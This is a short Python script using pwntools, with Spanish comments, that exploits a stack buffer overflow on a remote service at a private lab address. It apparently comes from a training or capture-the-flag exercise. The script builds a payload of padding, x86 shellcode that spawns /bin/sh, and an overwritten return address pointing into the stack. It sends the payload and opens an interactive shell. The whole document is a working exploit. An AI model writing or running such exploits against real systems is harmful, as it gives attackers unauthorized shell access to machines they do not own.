from pwn import *
import struct
p = remote('192.168.32.129', 1234)
eip = struct.pack("I", 0xbffff604)
exploit = "" #Sobreescribimos EIP a partir de \x90*76
exploit += "AAAA"
exploit += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
exploit += "A"*(24)
exploit += eip #sobreescribimos eip para controlarlo y saltar donde nosotros queramos en este caso la direccion de memoria de $esp que es la siguiente direccion de memoria del eip
exploit += "BBBB"
p.sendline(exploit)

p.interactive()
